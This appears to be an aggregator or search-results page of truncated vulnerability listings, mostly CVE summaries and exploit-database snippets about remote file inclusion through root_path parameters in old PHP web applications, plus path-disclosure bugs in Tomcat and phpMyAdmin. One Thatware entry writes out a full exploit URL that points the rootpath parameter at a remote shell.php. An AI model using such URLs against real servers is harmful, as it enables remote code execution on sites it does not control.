CVE-2006-4063

Multiple PHP remote file inclusion vulnerabilities in Csaba Godor SAPID Blog Beta 2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the 1 rootpath parameter to a usr/extensions/getbloginfochannel.inc.php, b usr/extensions/getblogmetainfo.inc.php, or c...

Thatware 0.4.6 - ROOT_PATH Remote File Inclusion

Thatware 0.4.6 - ROOTPATH Remote File Inclusion Thatware 0.4.6 rootpath Remote File Inclusion CreW: ToXiC Bug Found by Drago84 Source Code: http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware0.4.6.tar.gz Page Affect config.php ExP:...

Thatware 0.4.6 - 'ROOT_PATH' Remote File Inclusion

Thatware 0.4.6 rootpath Remote File Inclusion CreW: ToXiC Bug Found by Drago84 Source Code: http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware0.4.6.tar.gz Page Affect config.php ExP: http://server/dirthatware/config.php?rootpath=http://server/shell.php' Greatz: str0ke milw0rm.com...

SAPID Shop 1.2 - ROOT_PATH Remote File Inclusion

SAPID Shop 1.2 - ROOTPATH Remote File Inclusion $$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$ $$ $$ SAPID Shop = v.1.2 rootpath Remote File Include Vulnerability $$ Script site: http://sapid.sourceforge.net/ $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $...

SAPID Gallery <= 1.0 (root_path) Remote File Include Vulnerabilities

Exploit for unknown platform in category web applications ==================================================================== SAPID Gallery = 1.0 rootpath Remote File Include Vulnerabilities ==================================================================== $$$$$$$$$$$$$$$ DEVIL TEAM THE BEST...

SAPID Shop 1.2 - &#039;ROOT_PATH&#039; Remote File Inclusion

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$ $$ $$ SAPID Shop = v.1.2 rootpath Remote File Include Vulnerability $$ Script site: http://sapid.sourceforge.net/ $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$ Find by: Kacper a.k.a Rahim $$ $$ Contact:...

SAPID Gallery 1.0 - &#039;ROOT_PATH&#039; Remote File Inclusion

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$ $$ $$ SAPID Gallery = v.1 rootpath Remote File Include Vulnerability $$ Script site: http://sapid.sourceforge.net/ $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$ Find by: Kacper a.k.a Rahim $$ $$ Contact:...

phpMySms 2.0 (ROOT_PATH) Remote File Include Vulnerability

No description provided by source. PhpMySms = V2.0 ROOTPATH Remote File Include Vulnerability URL : Http://www.phpmysms.com Author=Persian-Defacer www.Hacking-Boys.com ============================================================== if $POSTmode == "1" or $GETmode == "1" include "config.php"; else...

phpMySms 2.0 (ROOT_PATH) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ========================================================== phpMySms 2.0 ROOTPATH Remote File Include Vulnerability ========================================================== PhpMySms = V2.0 ROOTPATH Remote File Include Vulnerability URL :...

PT-2006-3777 · Mybloggie · Mybloggie

Name of the Vulnerable Software and Affected Versions: MyBloggie versions 2.1.1 and earlier Description: A remote file inclusion issue allows remote attackers to execute arbitrary PHP code via a URL in the mybloggie root path parameter to admin.php. The issue's validity has been disputed, with so...

ACID v1.1.3 CMS &#40;root_path&#41; - Remote File Include Vulnerabilities

DEVIL TEAM THE BEST POLISH TEAM ACID v1.1.3 CMS rootpath - Remote File Include Vulnerabilities Script site: http://herve.labas.free.fr/acid/en/ Find by Kacper Rahim. Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi Special greetz DragonHeart : Contact:...

CVE-2002-2090

Caucho Technology Resin server 2.1.1 to 2.1.2 allows remote attackers to obtain server's root path via requests for MS-DOS device names such as lpt9.xtp...

Comdev eCommerce 3.0 - &#039;WCE.download.php&#039; Directory Traversal

source: https://www.securityfocus.com/bid/14479/info Comdev eCommerce is prone to a directory traversal vulnerability. A remote unauthorized user can disclose the contents of arbitrary local files through the use of directory traversal strings '../' relative to the Web application's root path...

CVE-2002-2009

Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by 1 +/, 2 /, 3 /, and 4 %20/, which leaks the pathname in an error message...

CVE-2002-2007

The CVE-2002-2007 vulnerability affects Apache Tomcat 3.2.3 and 3.2.4, where remote attackers could obtain sensitive information (directory listings and web root path) via erroneous HTTP requests to JSP-related paths (test/jsp, samples/jsp, examples/jsp) or the test/realPath.jsp servlet, leaking ...

CVE-2002-2007

The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages JSP in the 1 test/jsp, 2 samples/jsp and 3 examples/jsp directories, or the 4...

DEBIAN-CVE-2005-0459

phpMyAdmin 2.6.2-dev, and possibly earlier versions, allows remote attackers to determine the full path of the web root via a direct request to selectlang.lib.php, which reveals the path in a PHP error message...

CVE-2005-0459

phpMyAdmin 2.6.2-dev, and possibly earlier versions, allows remote attackers to determine the full path of the web root via a direct request to selectlang.lib.php, which reveals the path in a PHP error message...

CVE-2001-1437

Technical details about CVE-2001-1437 are not publicly available in the provided documents; monitor for updates.

CVE-2005-0722

eXPerience2 allows remote attackers to obtain the full path for the web root via a direct request to modules.php without any parameters, which leaks the path in a PHP error message...